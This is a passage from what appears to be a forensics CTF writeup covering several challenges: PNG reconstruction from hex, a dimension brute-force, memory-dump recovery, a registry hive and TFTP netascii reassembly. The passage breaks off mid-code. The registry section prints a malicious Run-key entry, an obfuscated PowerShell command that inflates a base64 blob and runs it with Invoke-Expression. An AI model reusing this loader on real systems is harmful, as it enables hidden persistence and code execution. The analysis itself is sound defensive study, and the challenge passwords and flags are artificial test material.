00 17 00 2B 00 48 00 1A 00 3E 00 2B 00 58 00 B6 00 14 00 24 00 4D 00 BC 00 15 00 B4 00 82 00 C5 00 4B 00 C1 00 38 00 61 00 05 00 23 00 AC 00 60 00 F1 00 52 00 30 00 6E 00 B3 00 82 00 56 00 B0 00 45 00 29 00 38 00 0E 00 96 00 15 00 B4 00 82 00 65 00 4B 00 C1 00 63 00 8F 00 62 00 05 00 8F 00 8B 00 46 00 0A 00 0E 00 63 00 55 00 04 00 C1 00 78 00 B3 00 82 00 11 00 56 00 70 00 3E 00 1F 00 72 00 FB 00 9B 00 44 00 F0 00 D8 00 AB 00 B1 00 82 00 CD 00 15 00 94 00 28 00 89 00 60 00 EC 00 DF 00 F0 00 3E 00 19 00 EF 00 93 00 A9 00 BB 00 4F 00 E6 00 E8 00 F8 00 0D 00 58 00 41 00 2B 00 38 00 2A 00 78 00 5E 00 F9 00 B0 00 81 00 52 00 30 00 3A 00 EA 00 5A 00 70 00 BE 00 9F 00 5E 00 10 00 E7 00 D8 00 30 00 82 00 F9 00 A2 00 35 00 24 00 93 00 15 00 5C 00 85 00 82 00 12 00 25 00 11 00 64 00 AF 00 1D 00 B5 00 82 00 39 00 36 00 AC 00 60 00 BA 00 A6 00 14 00 82 00 F9 00 01 00 56 00 D0 00 0A 00 16 00 2F 00 05 00 49 00 53 00 6E 00 05 00 A7 00 22 00 F7 00 A1 00 85 00 82 00 8B 00 E7 00 7D 00 63 00 08 00 46 00 13 00 56 00 70 00 6D 00 89 00 EB 00 52 00 F0 00 44 00 10 00 1C 00 07 00 CE 00 0A 00 5A 00 C1 00 B2 00 A5 00 60 00 3E 00 91 00 1F 00 60 00 05 00 23 00 9A 00 2A 00 38 00 7C 00 2E 00 82 00 
E0 00 78 00 C2 00 0A 00 5A 00 C1 00 1C 00 B9 00 FD 00 CD 00 23 00 98 00 BF 00 58 00 41 00 2B 00 58 00 BC 00 14 00 CC 00 FF 00 37 00 93 00 F7 00 C9 00 78 00 9F 00 4C 00 C5 00 7D 00 32 00 70 00 F4 00 4F 00 A8 00 5A 00 41 00 2B 00 38 00 3B 00 E3 00 A5 00 4A 00 C1 00 E8 00 B4 00 6B 00 C1 00 31 00 BC 00 20 00 CE 00 51 00 04 00 C1 00 A9 00 9B 00 AD 00 60 00 6B 00 05 00 25 00 4A 00 22 00 C8 00 CE 00 1D 00 B5 00 82 00 39 00 8A 00 28 00 38 00 71 00 EF 00 E6 00 11 00 64 00 76 00 E2 00 AD 00 60 00 53 00 05 00 77 00 EE 00 E7 00 4A 00 11 00 8C 00 1B 00 AC 00 E0 00 18 00 B9 00 0F 00 ED 00 14 00 9C 00 9D 00 F7 00 0D 00 23 00 18 00 CD 00 59 00 C1 00 35 00 24 00 EE 00 8A 00 14 00 94 00 28 00 89 00 60 00 7C 00 B1 00 82 00 56 00 B0 00 45 00 29 00 48 00 7A 00 80 00 15 00 8C 00 B0 00 82 00 11 00 05 00 11 00 8C 00 37 00 2B 00 68 00 05 00 73 00 E4 00 F6 00 4B 00 21 00 38 00 75 00 C2 00 0A 00 1E 00 33 00 58 00 13 00 9F 00 0B 00 2A 00 28 00 51 00 12 00 C1 00 D8 00 D7 00 E1 00 7D 00 32 00 DE 00 27 00 93 00 5F 00 B5 00 F6 00 C9 00 1C 00 BD 00 5E 00 B1 00 82 00 56 00 B0 00 51 00 29 00 38 00 26 00 93 00 6B 00 C1 00 08 00 2F 00 88 00 0B 00 22 00 98 00 6F 00 B6 00 82 00 56 00 B0 00 F8 00 82 00 98 00 F3 00 EA 00 A8 00 15 00 CC 00 51 00 50 00 C1 00 14 00 A5 00 10 00 8C 00 A5 00 D5 00 A7 00 01 00 B8 00 07 00 80 00 C7 00 01 00 B8 00 03 00 80 00 7B 00 D3 00 F1 00 FB 00 D3 00 22 00 23 00 97 00 FF 00 67 00 00 00 FF 00 47 00 C4 00 5E 00 10 00 6F 00 63 00 41 00 6C 00 05 00 AD 00 E0 00 82 00 79 00 2F 00 52 00 0A 00 46 00 D3 00 AE 00 05 00 73 00 78 00 41 00 5C 00 B6 00 14 00 1C 00 6F 00 B0 00 82 00 56 00 B0 00 EC 00 82 00 38 00 0E 00 59 00 41 00 2B 00 18 00 51 00 BC 00 14 00 8C 00 2F 00 56 00 D0 00 0A 00 E6 00 F6 00 CB 00 96 00 82 00 F9 00 84 00 15 00 9C 00 1F 00 AC 00 46 00 0A 00 4A 00 94 00 44 00 30 00 FF 00 3B 00 33 00 FE 00 B5 00 60 00 7E 00 F9 00 D7 00 82 00 55 00 F6 00 C9 00 E4 00 B3 00 56 00 D0 00 0A 00 2E 00 38 00 5B 00 A4 00 14 00 8C 00 1F 00 C6 00 B5 00 60 00 84 00 17 00 C4 00 C5 00 4B 00 C1 00 
78 00 B3 00 82 00 FB 00 4A 00 88 00 22 00 0A 00 4A 00 94 00 44 00 70 00 79 00 47 00 AD 00 60 00 8E 00 E2 00 0A 00 4A 00 94 00 44 00 30 00 4E 00 5B 00 41 00 2B 00 D8 00 A2 00 14 00 24 00 0D 00 9F 00 15 00 B4 00 82 00 79 00 DE 00 0B 00 22 00 48 00 EA 00 BA 00 15 00 B4 00 82 00 C5 00 4B 00 C1 00 78 00 B3 00 82 00 56 00 B0 00 45 00 29 00 98 00 A7 00 73 00 6D 00 89 00 6B 00 05 00 5D 00 0A 00 EE 00 19 00 C1 00 DD 00 27 00 DE 00 0A 00 16 00 54 00 30 00 8D 00 E7 00 DA 00 12 00 77 00 27 00 04 00 49 00 43 00 3C 00 15 00 56 00 30 00 A2 00 91 00 82 00 3B 00 CF 00 FB 00 4A 00 11 00 8C 00 FD 00 1E 00 DE 00 27 00 13 00 2F 00 EF 00 93 00 A9 00 B8 00 4F 00 26 00 9F 00 B5 00 82 00 56 00 70 00 E2 00 6C 00 C1 00 52 00 90 00 BD 00 26 00 44 00 7E 00 40 00 8B 00 5A 00 30 00 0D 00 F1 00 54 00 B8 00 14 00 8C 00 58 00 05 00 82 00 71 00 C8 00 0A 00 5A 00 C1 00 16 00 0B 00 E2 00 F9 00 8E 00 5A 00 C1 00 1C 00 8D 00 14 00 94 00 28 00 89 00 20 00 17 00 30 00 21 00 AC 00 E0 00 7C 00 42 00 E4 00 F6 00 5D 00 0A 00 46 00 EC 00 19 00 C1 00 F8 00 62 00 05 00 AD 00 60 00 8B 00 52 00 30 00 1E 00 69 00 05 00 AD 00 20 00 69 00 F4 00 CA 00 96 00 82 00 F3 00 13 00 90 00 3B 00 61 00 05 00 F3 00 C4 00 17 00 57 00 50 00 A2 00 24 00 82 00 F9 00 86 00 35 00 24 00 AE 00 15 00 5C 00 85 00 82 00 B3 00 91 00 FB 00 B0 00 31 00 04 00 39 00 AF 00 89 00 B7 00 82 00 C5 00 15 00 4C 00 D7 00 AF 00 21 00 71 00 F7 00 86 00 E0 00 D4 00 CD 00 56 00 30 00 A2 00 A9 00 82 00 E7 00 35 00 EF 00 1B 00 40 00 30 00 F6 00 7E 00 78 00 9F 00 8C 00 F7 00 C9 00 D4 00 DD 00 27 00 03 00 70 00 33 00 00 00 CF 00 63 00 05 00 AD 00 E0 00 A8 00 A0 00 44 00 C9 00 52 00 90 00 9D 00 13 00 22 00 3F 00 A0 00 5D 00 2D 00 38 00 11 00 2E 00 05 00 23 00 56 00 87 00 60 00 9C 00 B6 00 82 00 56 00 B0 00 C5 00 82 00 78 00 3C 00 61 00 05 00 73 00 34 00 55 00 50 00 A2 00 24 00 82 00 9C 00 70 00 42 00 58 00 C1 00 F9 00 84 00 C8 00 ED 00 AF 00 48 00 C1 00 21 00 8A 00 20 00 18 00 27 00 AC 00 60 00 C4 00 1A 00 92 00 69 00 15 00 0A 00 9E 00 70 00 3E 00 BC 00 61 00 
08 00 C6 00 E3 00 AD 00 A0 00 15 00 6C 00 51 00 0A 00 8E 00 17 00 E5 00 4E 00 58 00 C1 00 3C 00 F1 00 8D 00 14 00 94 00 28 00 89 00 E0 00 B1 00 AD 00 60 00 05 00 9B 00 2B 00 38 00 DB 00 87 00 0D 00 23 00 C8 00 E2 00 89 00 B7 00 82 00 8D 00 14 00 9C 00 68 00 67 00 F3 00 08 00 E6 00 2F 00 56 00 30 00 C2 00 0A 00 96 00 2D 00 05 00 63 00 1F 00 88 00 F7 00 C9 00 78 00 9F 00 4C 00 DD 00 7D 00 32 00 00 00 B7 00 01 00 F0 00 04 00 56 00 D0 00 0A 00 8E 00 0A 00 4A 00 94 00 2C 00 05 00 39 00 AF 00 84 00 C8 00 0F 00 68 00 5D 00 0B 00 A6 00 70 00 29 00 18 00 B1 00 6A 00 04 00 E3 00 52 00 2B 00 B8 00 24 00 21 00 1A 00 29 00 78 00 5E 00 F9 00 90 00 DB 00 5F 00 29 00 82 00 A4 00 1F 00 3B 00 C2 00 0A 00 5A 00 C1 00 B2 00 A5 00 E0 00 C1 00 50 00 E0 00 9F 00 01 00 0E 00 17 00 82 00 A7 00 87 00 B3 00 A4 00 23 00 E3 00 59 00 FF 00 47 00 C4 00 F9 00 E5 00 05 00 F1 00 FA 00 16 00 C4 00 56 00 D0 00 0A 00 8E 00 0A 00 9E 00 40 00 3E 00 AC 00 A2 00 14 00 8C 00 AE 00 B8 00 16 00 F4 00 82 00 F8 00 11 00 89 00 F2 00 A5 00 E0 00 D8 00 09 00 2B 00 98 00 27 00 BE 00 A9 00 82 00 12 00 25 00 11 00 CC 00 0D 00 59 00 41 00 2B 00 38 00 D5 00 87 00 22 00 08 00 32 00 3B 00 F1 00 56 00 B0 00 A9 00 82 00 29 00 4A 00 21 00 18 00 6F 00 56 00 D0 00 0A 00 B6 00 28 00 05 00 E3 00 22 00 2B 00 68 00 05 00 73 00 94 00 2D 00 05 00 97 00 0C 00 96 00 15 00 6C 00 A7 00 A0 00 44 00 49 00 04 00 97 00 27 00 44 00 7E 00 80 00 15 00 8C 00 28 00 AB 00 E0 00 82 00 B1 00 DA 00 24 00 82 00 53 00 9D 00 B0 00 82 00 11 00 4D 00 15 00 5C 00 9C 00 0F 00 B9 00 FD 00 0D 00 20 00 18 00 5F 00 AC 00 A0 00 15 00 6C 00 51 00 0A 00 C6 00 6E 00 0D 00 EF 00 93 00 F1 00 3E 00 99 00 BA 00 FB 00 64 00 E0 00 E8 00 2F 00 8E 00 58 00 41 00 2B 00 38 00 2A 00 B8 00 A7 00 7C 00 58 00 5D 00 29 00 18 00 DD 00 72 00 2D 00 78 00 AE 00 FD 00 F4 00 82 00 38 00 C7 00 66 00 10 00 CC 00 03 00 61 00 05 00 AD 00 60 00 F1 00 05 00 71 00 BC 00 59 00 41 00 2B 00 38 00 F6 00 A1 00 20 00 82 00 0C 00 13 00 6F 00 05 00 AD 00 60 00 D9 00 52 00 30 00 0E 00 59 00 C1 00 
1C 00 56 00 B0 00 6C 00 29 00 18 00 37 00 58 00 41 00 2B 00 D8 00 A2 00 14 00 9C 00 1A 00 2C 00 2B 00 D8 00 5A 00 41 00 89 00 92 00 08 00 CE 00 27 00 44 00 7E 00 80 00 15 00 8C 00 68 00 A1 00 E0 00 C4 00 58 00 6D 00 1E 00 C1 00 DC 00 90 00 15 00 8C 00 B0 00 82 00 F3 00 F9 00 90 00 DB 00 DF 00 18 00 82 00 C7 00 5E 00 77 00 56 00 EA 00 8C 00 61 00 05 00 E7 00 C7 00 6A 00 F3 00 0A 00 A6 00 28 00 85 00 60 00 EC 00 DC 00 F0 00 3E 00 19 00 EF 00 93 00 79 00 01 00 A8 00 B9 00 4F 00 06 00 8E 00 FE 00 81 00 55 00 2B 00 68 00 05 00 47 00 05 00 77 00 C8 00 87 00 55 00 97 00 82 00 D1 00 45 00 D7 00 82 00 4B 00 FA 00 E9 00 05 00 71 00 8E 00 4D 00 22 00 18 00 27 00 D6 00 96 00 4C 00 56 00 D0 00 0B 00 E2 00 DC 00 FE 00 DE 00 10 00 8C 00 43 00 56 00 D0 00 0A 00 B6 00 28 00 05 00 C7 00 1F 00 C6 00 0A 00 5A 00 C1 00 B2 00 A5 00 60 00 9C 00 B6 00 82 00 56 00 B0 00 45 00 29 00 18 00 37 00 5B 00 41 00 2B 00 D8 00 A2 00 14 00 9C 00 1A 00 38 00 2B 00 D8 00 5A 00 41 00 89 00 92 00 08 00 8E 00 27 00 F2 00 03 00 AC 00 60 00 44 00 3B 00 05 00 27 00 3E 00 6F 00 1E 00 C1 00 A9 00 CE 00 59 00 C1 00 D6 00 0A 00 0E 00 91 00 DB 00 DF 00 30 00 82 00 E3 00 0D 00 56 00 D0 00 0A 00 96 00 2D 00 05 00 0F 00 86 00 1D 00 11 00 DE 00 27 00 E3 00 7D 00 32 00 B5 00 F6 00 C9 00 1C 00 5D 00 F9 00 62 00 FE 00 53 00 65 00 05 00 AD 00 60 00 F1 00 52 00 30 00 BA 00 EB 00 5A 00 D0 00 0B 00 E2 00 16 00 A5 00 E0 00 FF 00 00 00 A1 00 19 00 4B 00 C2 00 8F 00 11 00 53 00 08 00 00 00 00 00 00 00 00 00 49 00 45 00 4E 00 44 00 AE 00 42 00 60 00 82"

# Every other value is the 00 high byte of a UTF-16 code unit; the low bytes are the PNG
data_list = data.split()
result = b''
for i in range(0, len(data_list), 2):
    result += bytes.fromhex(data_list[i])

with open("output.png", "wb") as file:
    file.write(result)
```

I got an image file like this:

![Untitled 13](https://hackmd.io/_uploads/By0MHkhDT.png)

Hmm, it looks like this image has to be decoded too. I tried steg and exiftool and found nothing, and the hexdump showed nothing unusual either.
I checked the bit planes on CyberChef and only the blue channel has anything in it, and the white dots in the image look quite peculiar, so I will look at the pixel values of the blue channel. Script here:

```python
import cv2

# Load the bitmap image
img = cv2.imread("flag.png", cv2.IMREAD_UNCHANGED)

# Get the image dimensions
height, width = img.shape[:2]

# Walk every row and column and write the blue channel of each pixel as hex,
# one image row per line
with open("unicode.txt", "w") as file:
    for y in range(height):
        for x in range(width):
            # Colour channels of the pixel at (x, y); OpenCV stores them as B, G, R
            b, g, r = img[y, x][:3]
            red = hex(r)
            green = hex(g)
            blue = hex(b)
            file.write(blue + " ")
        file.write("\n")
```

Here I only take the blue channel.

![Untitled 14](https://hackmd.io/_uploads/Ski4HJ3wp.png)

You can also see that the hiding scheme is the same as for the image earlier, so I extract it again.

```python
with open("unicode.txt", "r") as file:
    data = file.read()
data = data.split()
res = ""
# As with the earlier image, only every other value carries the payload
for i in range(1, len(data), 2):
    res += data[i] + " "
print(res)
```

Decoding it on [Cyberchef](https://gchq.github.io/CyberChef/#recipe=From_Hex('Auto')&input=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) shows that this is a zip file. I download it and open it, but it needs a password. I remember the strange string from exiftool at the beginning.

pass: `y0u_c4n_n0t_cr4ck_th1s_f1l3_w1th_th3_d3f4ut_w0rdl1st_0n_k4l1`

I open flag.txt and get the flag.

---

# 0x0

- **File: legit.png**

*Description: Recently, during an incident, we discovered that an attacker had stolen our data by embedding it into an image file and using upload features to get the data out of our system safely. Can you find out what the hidden data is?*

This file is corrupt: its dimensions are wrong (0x0), so I will rely on the CRC checksum of the IHDR chunk to brute-force the image dimensions.
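The IHDR CRC brute-force described above, as an added example that is neither the writeup's nor the linked repository's code: the CRC stored after the IHDR chunk was computed over the original width and height, so trying width x height pairs until the CRC matches recovers them. The sample PNG is constructed here with its IHDR zeroed the way legit.png's is, and the search bound `max_side` is an assumed limit.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def build_ihdr(width, height, bit_depth=8, colour_type=6):
    """Return a complete IHDR chunk: 4-byte length, type, 13-byte payload, 4-byte CRC.
    The CRC covers the chunk type and payload, so it depends on width and height."""
    payload = struct.pack(">IIBBBBB", width, height, bit_depth, colour_type, 0, 0, 0)
    crc = zlib.crc32(b"IHDR" + payload)
    return struct.pack(">I", 13) + b"IHDR" + payload + struct.pack(">I", crc)


def make_corrupted_sample(width, height):
    """Constructed sample, not the challenge file: a PNG header whose IHDR says 0x0
    but whose CRC still matches the real dimensions, like legit.png."""
    good = PNG_SIGNATURE + build_ihdr(width, height)
    return good[:16] + struct.pack(">II", 0, 0) + good[24:]


def parse_ihdr(png):
    """Return (width, height, payload, stored_crc) from the first chunk, which must be IHDR."""
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    length, ctype = struct.unpack(">I4s", png[8:16])
    if ctype != b"IHDR" or length != 13:
        raise ValueError("first chunk is not a 13-byte IHDR")
    payload = png[16:29]
    stored_crc = struct.unpack(">I", png[29:33])[0]
    width, height = struct.unpack(">II", payload[:8])
    return width, height, payload, stored_crc


def bruteforce_dimensions(png, max_side=2000):
    """Try every width x height up to max_side (an assumed bound) and return the pair
    whose IHDR CRC equals the stored one, or None if nothing matches."""
    _, _, payload, stored_crc = parse_ihdr(png)
    tail = payload[8:]  # bit depth, colour type, compression, filter, interlace
    crc_type = zlib.crc32(b"IHDR")
    for width in range(1, max_side + 1):
        # zlib.crc32 accepts a running value, so the prefix is hashed once per width
        crc_w = zlib.crc32(struct.pack(">I", width), crc_type)
        for height in range(1, max_side + 1):
            if zlib.crc32(struct.pack(">I", height) + tail, crc_w) == stored_crc:
                return width, height
    return None


def fix_png(png, width, height):
    """Write the recovered dimensions back into IHDR; the stored CRC already matches them."""
    return png[:16] + struct.pack(">II", width, height) + png[24:]


if __name__ == "__main__":
    sample = make_corrupted_sample(300, 200)
    print("reported:", parse_ihdr(sample)[:2])
    dims = bruteforce_dimensions(sample, max_side=400)
    print("recovered:", dims)
    print("fixed:", parse_ihdr(fix_png(sample, *dims))[:2])
```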
Reference script: https://github.com/cjharris18/png-dimensions-bruteforcer

![Untitled 15](https://hackmd.io/_uploads/SkOcr13w6.png)

---

# SS2 - Tin học văn phòng (Office Computing)

- **File: Challenge.doc**

*Description: After taking a basic office-computing course, Hòa was able to create a malicious document file on his own, and he intends to use it to hack the whole world*

This challenge is only about macros; I use `olevba <filename>` to extract the macros from the doc file.

---

# SS2 - Báo cáo đang dở (Unfinished Report)

- **File: MEMORY.DMP .raw, .mem**

*Description: Hòa was writing the report for his course project to hand in to his teacher when his computer suddenly shut down because of a power cut, and he had not saved the report even once. Afterwards, instead of writing a new report, Hòa chose to spend 4 hours trying to recover the original report from the crash dump file, but in the end he still failed. Hòa really needs help.*

This is a memory forensics challenge, so I will use the Volatility 3 framework. First, list the processes.
```
PID   PPID  ImageFileName   Offset(V)       Threads Handles SessionId Wow64 CreateTime                  ExitTime File output
4     0     System          0xfa80024bb840  90      512     N/A       False 2023-05-31 18:18:24.000000  N/A      Disabled
268   4     smss.exe        0xfa8002c5e400  2       30      N/A       False 2023-05-31 18:18:24.000000  N/A      Disabled
356   340   csrss.exe       0xfa80037e7060  9       451     0         False 2023-05-31 18:18:26.000000  N/A      Disabled
440   340   wininit.exe     0xfa8003a68060  3       79      0         False 2023-05-31 18:18:26.000000  N/A      Disabled
460   448   csrss.exe       0xfa8003a67060  10      231     1         False 2023-05-31 18:18:26.000000  N/A      Disabled
520   448   winlogon.exe    0xfa8003ab6700  3       111     1         False 2023-05-31 18:18:26.000000  N/A      Disabled
528   440   services.exe    0xfa8003ab7810  7       207     0         False 2023-05-31 18:18:26.000000  N/A      Disabled
564   440   lsass.exe       0xfa8003aeab30  9       570     0         False 2023-05-31 18:18:26.000000  N/A      Disabled
572   440   lsm.exe         0xfa8003aec810  10      144     0         False 2023-05-31 18:18:26.000000  N/A      Disabled
672   528   svchost.exe     0xfa8003b6e3c0  10      356     0         False 2023-05-31 18:18:27.000000  N/A      Disabled
732   528   vmacthlp.exe    0xfa8003b9fb30  3       56      0         False 2023-05-31 18:18:27.000000  N/A      Disabled
768   528   svchost.exe     0xfa8003bd3b30  9       292     0         False 2023-05-31 18:18:27.000000  N/A      Disabled
868   528   svchost.exe     0xfa8003c18060  20      480     0         False 2023-05-31 18:18:27.000000  N/A      Disabled
924   528   svchost.exe     0xfa8003c52b30  16      377     0         False 2023-05-31 18:18:27.000000  N/A      Disabled
952   528   svchost.exe     0xfa8003c613a0  42      1036    0         False 2023-05-31 18:18:27.000000  N/A      Disabled
400   528   svchost.exe     0xfa8003cb24b0  12      542     0         False 2023-05-31 18:18:27.000000  N/A      Disabled
856   528   svchost.exe     0xfa8003ce3b30  15      364     0         False 2023-05-31 18:18:27.000000  N/A      Disabled
1116  528   spoolsv.exe     0xfa8003d6f250  15      338     0         False 2023-05-31 18:18:27.000000  N/A      Disabled
1148  528   svchost.exe     0xfa8003d91b30  19      316     0         False 2023-05-31 18:18:27.000000  N/A      Disabled
1340  924   dwm.exe         0xfa8003e38b30  5       124     1         False 2023-05-31 18:18:28.000000  N/A      Disabled
1372  1304  explorer.exe    0xfa8003e64960  39      1058    1         False 2023-05-31 18:18:28.000000  N/A      Disabled
1472  528   taskhost.exe    0xfa8003ea8410  8       145     1         False 2023-05-31 18:18:28.000000  N/A      Disabled
1544  528   VGAuthService.  0xfa8003f23b30  3       85      0         False 2023-05-31 18:18:28.000000  N/A      Disabled
1684  528   vmtoolsd.exe    0xfa8003f6f200  9       293     0         False 2023-05-31 18:18:28.000000  N/A      Disabled
1928  1372  vmtoolsd.exe    0xfa800407db30  6       186     1         False 2023-05-31 18:18:29.000000  N/A      Disabled
1288  528   svchost.exe     0xfa8004087060  5       103     0         False 2023-05-31 18:18:29.000000  N/A      Disabled
1316  672   WmiPrvSE.exe    0xfa8004b03060  10      211     0         False 2023-05-31 18:18:29.000000  N/A      Disabled
2136  528   dllhost.exe     0xfa8004b05b30  15      207     0         False 2023-05-31 18:18:29.000000  N/A      Disabled
2288  528   msdtc.exe       0xfa8004480b30  14      154     0         False 2023-05-31 18:18:30.000000  N/A      Disabled
2564  528   SearchIndexer.  0xfa80045344a0  13      616     0         False 2023-05-31 18:18:34.000000  N/A      Disabled
2844  672   WmiPrvSE.exe    0xfa80045b8530  10      239     0         False 2023-05-31 18:18:49.000000  N/A      Disabled
1736  1372  WINWORD.EXE     0xfa8003a6e060  13      443     1         False 2023-05-31 18:20:18.000000  N/A      Disabled
2792  528   svchost.exe     0xfa8003c86920  5       74      0         False 2023-05-31 18:20:18.000000  N/A      Disabled
2956  528   OSPPSVC.EXE     0xfa8003fcab30  3       129     0         False 2023-05-31 18:20:19.000000  N/A      Disabled
1916  528   svchost.exe     0xfa8003f83b30  12      321     0         False 2023-05-31 18:20:29.000000  N/A      Disabled
2484  868   audiodg.exe     0xfa8003c83b30  6       136     0         False 2023-05-31 18:26:32.000000  N/A      Disabled
1076  2228  taskmgr.exe     0xfa8004103b30  9       121     1         False 2023-05-31 18:27:43.000000  N/A      Disabled
```

According to the description we are looking for the unfinished report, and one interesting process is WINWORD.EXE with PID 1736, i.e. MS Word running, so I will dump this process. In the data section there is a file `AutoRecovery save of Document1.asd`; this is MS Word's AutoRecover mechanism, so the report has most likely been auto-recovered there, and I run binwalk on it to look at its contents. Under the path `_file.0xfa80041e2070.0xfa8003d7b6d0.DataSectionObject.AutoRecovery save of Document1.asd.dat.extracted\word\media` there are 2 images, and one of them contains the flag.
![image2](https://hackmd.io/_uploads/Sk4W8Jhwp.png)

---

# SS2 - Sổ đăng kí (Registry)

- **File: NTUSER.DAT**

Description: *Hòa notices something strange every time he boots his computer. He thinks that downloading some unwholesome videos recently got his computer hacked.*

The challenge gives us the file NTUSER.DAT; first we need to know what kind of file this is.

![Untitled 16](https://hackmd.io/_uploads/r14MIkhvp.png)

(This site provides basic information about the [Windows Registry](https://winreg-kb.readthedocs.io/en/latest/sources/windows-registry/Files.html), or there is a blog in Vietnamese: [blog](https://sec.vnpt.vn/2021/04/windows-forensic-registry-analysis-part1/))

It is a registry hive, so I need Registry Explorer on Windows, or regripper, to analyse it. However, I could not load it into Registry Explorer, so I will use [regripper](https://manpages.ubuntu.com/manpages/jammy/man1/regripper.1.html).

Parse the file: `regripper -r /path/to/Cookie/SS2/arenas2-forensics-so-dang-ki/NTUSER.DAT -f ntuser > parsed.txt`

I redirect the output into a text file for easier analysis.
At the key `Software\Microsoft\Windows\CurrentVersion\Run` (which holds the executables that are started automatically when the user logs in):

```
Software\Microsoft\Windows\CurrentVersion\Run
LastWrite Time 2023-05-25 03:55:25Z
  Updater - "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "(neW-obJEct io.COMprEssIon.dEFlATesTReAm( [sySTem.IO.memorYSTREam] [coNVeRT]::FRoMBAse64stRInG( 'TVFva4JAGP8qh7hxx/IwzbaSBZtsKwiLGexFhJg+pMs09AmL6rvP03S9uoe739/nZD+OIEHySmwolNn6F3wkzilH2HEbkDupvwXM+cKaWxWSSt2Bxrv9F64ZOteepU5vYOjMlHPMwNuVQnItyb8AneqOMnO5PiEsVytZnHkJUjnvG4ZuXB7O6tUswigGSuVI0Gsh/g1eQGt8h6gdUo98CskGQ8aIkgBR2dmUAw+9kkfvCiiL0x5sbwdNlQUckb851mTykfhpECUbdstXjo2LMIlEE0iCtedvhWgER1I7aKPHLrmQ2QGVmkbuoFoVvOE9Eckaj8+26vbcTeomqptjL3OLUM/0q1Q+030RMD73MBTYEZFuSmUMYbpEERduSVfDYZW8SvwuktJ/33bx/CeLEGirU7Zp52ZpLfYzPuQhZVez+SsrTnOg7A8='), [SYSTEM.iO.ComPReSSion.CoMPrEsSIonmODe]::DeCOmpresS)|FOREAcH-object{ neW-obJEct io.streAMrEadeR( $_,[sysTem.TExt.EnCoDING]::asCIi )}).reaDToEnD()|inVOKe-exprEsSIon"
```

We can see that PowerShell runs a very suspicious command (a base64 blob is deflate-decompressed and passed to Invoke-Expression). Decoding it with [cyberchef](https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)Raw_Inflate(0,0,'Adaptive',false,false)&input=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) gives the following result:

![Untitled 17](https://hackmd.io/_uploads/SyWd813D6.png)

---

# SS2 - TrivialFTP

- **File: trivialFTP.pcapng**

*Description: Employees of a company X using insecure protocols to connect and transfer files remotely created an opportunity for attackers to perform Man in the Middle and steal important company data*

Based on the name of this challenge I filter on `tftp`, and see a packet like this.
After some googling I found a blog that explains the [TFTP](http://isp.vsi.ru/library/Networking/TCPIPIllustrated/tftp_tri.htm) protocol quite clearly; in particular it uses UDP to transfer data, so I will filter on that to make it easier to view.

![Untitled 18](https://hackmd.io/_uploads/Bk3_U13Pp.png)

We can see that the file `flag.pdf` is transferred in netascii mode. As mentioned, the data goes over UDP, so I filter again and start looking from packet 2973 onwards. If you read the TFTP link I attached above, you will see that each packet sent is 516 bytes long: the first 2 bytes are the opcode, the next 2 bytes are the block number, and the data is 512 bytes. Data is transferred block by block like this until a data block smaller than 512 bytes signals the end. As for the opcode, opcode = 3 is the data packet. So the filter is now `udp && ip.src == 192.168.25.135 && ip.dst == 192.168.25.1`

The last packet has a data length smaller than 512 bytes:

![Untitled 19](https://hackmd.io/_uploads/H19n8khwT.png)

Use tshark to extract the data:

```bash
tshark -r /path/to/file.pcapng -Y "udp && ip.src == 192.168.25.135 && ip.dst == 192.168.25.1" -T fields -e data.data > data.txt
```

Then write a script to strip the 4-byte header and recover the pdf file:

```python
data = ""
with open(r"arenas2-forensics-trivialFTP\output.txt", "r") as file:
    data = file.read()

# One hex string per packet, in capture order; convert each back to bytes
with open(r"arenas2-forensics-trivialFTP\flag.pdf", "wb") as file:
    lines = data.splitlines()
    for line in lines:
        line = line.strip()
        file.write(bytes.fromhex(line))
```

However, when I ran this script my pdf file came out broken. After a long time trying to fix it without success, I switched to trying to extract data from the broken pdf, but that was useless. In the end I realised I had overlooked an important piece of information: netascii.
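The block reassembly described above, together with the netascii translation that the next paragraph explains, as an added example that is not the writeup's own script: it parses hex lines like those tshark's `-T fields` export produces, orders the DATA blocks by block number, stops at the first short block, and undoes netascii over the whole reassembled stream rather than per block. It assumes each hex line is a complete TFTP DATA packet (opcode, block number, data); if an export already stripped the 4-byte header, only the netascii part applies. The sample lines are constructed from a small PDF-like file, not taken from the challenge capture.

```python
import struct

TFTP_DATA = 3          # opcode of a DATA packet
TFTP_BLOCK_SIZE = 512  # a DATA block shorter than this ends the transfer


def parse_data_packet(packet):
    """Split a TFTP packet into (block number, data); only opcode 3 (DATA) is accepted."""
    opcode, block = struct.unpack(">HH", packet[:4])
    if opcode != TFTP_DATA:
        raise ValueError(f"not a DATA packet (opcode {opcode})")
    return block, packet[4:]


def reassemble(packets):
    """Join DATA blocks in block-number order (ignoring retransmitted duplicates) and
    stop at the first block shorter than 512 bytes."""
    blocks = {}
    for packet in packets:
        block, data = parse_data_packet(packet)
        blocks.setdefault(block, data)  # keep the first copy of a retransmitted block
    out = bytearray()
    expected = 1
    while expected in blocks:
        out += blocks[expected]
        if len(blocks[expected]) < TFTP_BLOCK_SIZE:
            return bytes(out)
        expected += 1
    raise ValueError(f"block {expected} is missing from the capture")


def netascii_decode(data):
    """Undo netascii over a whole stream: CR LF -> LF, CR NUL -> CR.
    Working on the full stream matters: a CR may be the last byte of one block
    and its LF or NUL the first byte of the next."""
    out = bytearray()
    i = 0
    while i < len(data):
        if data[i] == 0x0D and i + 1 < len(data) and data[i + 1] in (0x0A, 0x00):
            out.append(0x0A if data[i + 1] == 0x0A else 0x0D)
            i += 2
        else:
            out.append(data[i])
            i += 1
    return bytes(out)


def netascii_encode(data):
    """The translation a client in netascii mode performs (used here to build the sample)."""
    return data.replace(b"\r", b"\r\x00").replace(b"\n", b"\r\n")


def recover_file(hex_lines):
    """Rebuild the transferred file from one hex string per packet."""
    packets = [bytes.fromhex(line.strip().replace(":", "")) for line in hex_lines if line.strip()]
    return netascii_decode(reassemble(packets))


def naive_hex_text_decode(hex_line):
    """Per-block replacement on the hex text, kept only to show its flaw: '0d0a' can
    match across a byte boundary (bytes 10 d0 af contain it), which corrupts the data."""
    return bytes.fromhex(hex_line[8:].replace("0d0a", "0a").replace("0d00", "0d"))


def build_sample_capture():
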